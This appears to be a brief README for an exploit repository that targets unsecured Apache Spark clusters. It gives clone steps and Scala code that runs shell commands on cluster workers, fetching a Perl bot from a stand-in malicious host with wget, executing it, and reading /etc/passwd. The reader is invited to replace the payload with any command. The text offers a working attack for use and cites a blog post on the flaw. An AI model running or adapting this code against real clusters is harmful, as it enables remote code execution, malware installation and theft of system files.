Follow the below steps:
* $ git clone https://github.com/akhld/spark-exploit.git
* $ cd spark-exploit
Open exploit.scala, Replace the following code with whatever you want to get executed!
val exploit = sc.parallelize(1 to 1).map(x=>{
//Replace these with whatever you want to get executed
val x = "wget https://mallicioushost/mal.pl -O bot.pl".!
val y = "perl bot.pl".!
scala.io.Source.fromFile("/etc/passwd").mkString
})
https://hacked.work/blog/arbitary-code-execution-in-unsecured-apache-spark-cluster/